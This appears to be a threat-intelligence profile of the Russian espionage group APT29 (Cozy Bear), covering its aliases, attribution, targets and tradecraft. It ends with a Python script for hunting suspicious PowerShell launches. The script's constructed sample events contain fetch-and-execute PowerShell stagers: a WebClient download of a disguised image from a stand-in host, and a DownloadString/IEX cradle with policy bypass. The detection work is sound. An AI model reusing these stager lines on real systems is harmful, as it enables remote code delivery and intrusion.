
APT29 – Cozy Bear – RUSSIA

August 13, 2021
in APT

APT29, also tracked as The Dukes, is a well-resourced, highly dedicated and organized cyberespionage group assessed to have been working for the Russian Federation since at least 2008, collecting intelligence in support of foreign and security policy decision-making. The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks, and governmental subcontractors. Their targets have also included the governments of members of the Commonwealth of Independent States; Asian, African, and Middle Eastern governments; organizations associated with Chechen extremism; and Russian speakers engaged in the illicit trade of controlled substances and drugs. The Dukes are known to employ a vast arsenal of malware toolsets, tracked as MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, and GeminiDuke. In recent years, the Dukes have engaged in apparently biannual large-scale spear-phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations.

Name: Cozy Bear (CrowdStrike), The Dukes (F-Secure), Group 100 (Talos), Yttrium (Microsoft), Iron Hemlock (SecureWorks), Minidionis (Palo Alto), CloudLook (Kaspersky), ATK 7 (Thales), ITG11 (IBM), UNC2452 (FireEye), Dark Halo (Volexity), SolarStorm (Palo Alto), StellarParticle (CrowdStrike), Nobelium (Microsoft), Iron Ritual (SecureWorks). The names from UNC2452 onward were assigned by vendors to the 2020 SolarWinds supply-chain intrusion cluster, which the U.S. government attributed to the SVR in April 2021; the earlier names refer to the long-running Dukes activity, so not every vendor treats the two as a single group.

Location: Russia

Suspected attribution: Russia’s Foreign Intelligence Service (SVR)

Date of initial activity: 2008

Targets: Government networks in Europe and NATO member countries, research institutes, and think tanks.

Motivation: Information theft and espionage

Associated tools: the Dukes malware toolsets (MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, GeminiDuke), plus custom PowerShell malware, in some cases developed for a single operation.

Attack vectors: The group relies mainly on email, with campaigns ranging from widespread mailings crafted to look like high-volume spam to targeted spear-phishing emails addressed to only a few individuals, carrying malicious attachments with customized content.

How they work: In some incidents, IRON HEMLOCK (SecureWorks' name for APT29) appears to have used compromised third-party networks to conduct attacks; for example, reports linked IRON HEMLOCK to the April 2015 breach of an unclassified White House network, and some sources claimed that the initial phishing emails were distributed from U.S. State Department email servers. IRON HEMLOCK also compromised the U.S. Democratic National Committee's network in 2016.

IRON HEMLOCK (also known as The Dukes or APT29) is a cyber-espionage group that has been operating since at least 2008. In 2018, media reports detailing a Dutch counterintelligence operation against IRON HEMLOCK strongly suggested that the group is a component of the SVR, Russia's foreign intelligence agency. This evidence, combined with observations of the threat group's activities and targeting, led Secureworks Counter Threat Unit (CTU) researchers to assess with high confidence that IRON HEMLOCK is operated by one of the Russian intelligence services, and with moderate confidence that it is specifically the SVR. The group has targeted government, foreign policy, and security-related organizations in former Soviet countries (Russia's "near abroad") and NATO member countries. CTU analysis suggests that it is tasked with stealing information to support strategic foreign policy and political decision-making. Given the SVR's remit, IRON HEMLOCK is likely used to support traditional SVR espionage operations overseas. IRON HEMLOCK has evolved a range of intrusion methods and capabilities that have enabled the group to retain its effectiveness despite multiple public disclosures.

IRON HEMLOCK operations observed by CTU researchers since 2016 have been stealthy and targeted, using multiple layers of encryption both within the malware itself and to protect communications between malware and C2 servers. The group is adept at developing and deploying custom PowerShell malware and may even build PowerShell-based tools specific to a single operation. Third-party reporting in 2019 also suggests heavy use of steganography to disguise its malware. Cozy Bear's activity appears to be limited to strategic targets, or perhaps to supporting broader SVR operations, so its volume of activity is likely far lower than that of other Russian government groups.
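Detection logic for the PowerShell tradecraft described above, as an added example; it is not code from this page or from any vendor report the profile quotes. It assumes process-creation telemetry carrying a parent image, image and command line (the fields of Sysmon Event ID 1 or Windows Event 4688). The events, the stager script and the .invalid hostnames are constructed for the example, and the indicators are generic heuristics for encoded or hidden PowerShell, download cradles, image-disguised payloads and document-spawned shells, not APT29 signatures.

```python
"""Hunting for suspicious PowerShell launches in process-creation telemetry.

Added example, not code from the page or from any vendor report it quotes.
The events below are constructed, modelled on Sysmon Event ID 1 / Windows 4688
fields; hostnames use the reserved .invalid TLD and nothing here is real
APT29 telemetry. The indicators are generic heuristics for the tradecraft
the profile describes: custom PowerShell tooling, encoded or hidden
invocations, payloads fetched as images, and phishing attachments that spawn
a shell.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# PowerShell accepts any unambiguous prefix of -EncodedCommand, so the common
# short forms -e and -enc are matched alongside the full switch.
ENCODED_RE = re.compile(r"\s-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_RE = re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)
CRADLE_RE = re.compile(
    r"Download(?:String|File|Data)|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer",
    re.I,
)
IMAGE_RE = re.compile(r"https?://\S+?\.(?:png|jpe?g|gif|bmp)\b", re.I)
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")


def decode_encoded_command(command_line):
    """Return the script behind -EncodedCommand, or None if absent or invalid.

    PowerShell base64-encodes the script as UTF-16LE, so decoding the bytes
    as UTF-8 (a common mistake) yields NUL-separated garbage.
    """
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16le", errors="replace")


def score_event(ev):
    """Return the list of heuristic indicators that fire for one event."""
    hits = []
    text = ev.command_line
    decoded = decode_encoded_command(ev.command_line)
    if decoded is not None:
        hits.append("encoded_command")
        text = f"{ev.command_line}\n{decoded}"  # inspect wrapper and payload
    if HIDDEN_RE.search(text):
        hits.append("hidden_window")
    if BYPASS_RE.search(text):
        hits.append("policy_bypass")
    if CRADLE_RE.search(text):
        hits.append("download_cradle")
        if IMAGE_RE.search(text):
            # An "image" pulled into a download cradle is a steganography hint.
            hits.append("image_payload")
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
    if parent in OFFICE_PARENTS:
        hits.append("office_parent")  # document-borne shell: phishing attachment
    return hits


def hunt(events, threshold=2):
    """Events with at least `threshold` indicators, plus any decoded payload."""
    findings = []
    for ev in events:
        hits = score_event(ev)
        if len(hits) >= threshold:
            findings.append((ev, hits, decode_encoded_command(ev.command_line)))
    return findings


def _encode(script):
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed stager: fetches a "logo" and executes whatever follows the first
# 1 KiB, the data-appended-to-picture trick the profile alludes to.
STAGER = (
    "$c=New-Object Net.WebClient;"
    "$b=$c.DownloadData('http://cdn.example.invalid/logo.png');"
    "IEX([Text.Encoding]::UTF8.GetString($b[1024..($b.Length-1)]))"
)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [  # constructed telemetry
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 "powershell.exe -NoProfile -Command Get-Service"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", PS,
                 f"powershell.exe -nop -w hidden -enc {_encode(STAGER)}"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS,
                 "powershell.exe -ExecutionPolicy Bypass -Command "
                 "\"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/u.ps1')\""),
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 f"powershell.exe -EncodedCommand {_encode('Get-Process | Sort-Object CPU')}"),
]

if __name__ == "__main__":
    for ev, hits, decoded in hunt(SAMPLE_EVENTS):
        print(f"[{len(hits)}] {ev.parent_image} -> {ev.command_line[:60]}")
        print("    indicators:", ", ".join(hits))
        if decoded:
            print("    decoded:", decoded)
```

With the default threshold of 2, the Word-spawned encoded stager and the plaintext execution-policy-bypass cradle are reported, while the admin's `Get-Service` and the benign encoded `Get-Process` are not; a single encoded command is too common in legitimate management tooling to alert on alone, which is why the indicators are combined rather than fired individually. On real telemetry, add suppressions for known automation accounts before raising the findings to a queue.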

Tags: Advanced Persistent Threat, APT29, Cozy Bear, Russia, The Dukes, Yttrium

    © 2025 | CyberMaterial | All rights reserved